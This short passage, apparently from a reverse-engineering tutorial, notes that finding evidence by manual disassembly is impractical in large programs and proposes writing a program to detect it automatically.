Guessing or finding evidence by disassembling has limitations. For a large program, we may have to guess thousands of times, and it is sometimes extremely hard to find the right spot among millions of instructions. So why not write a program to detect it?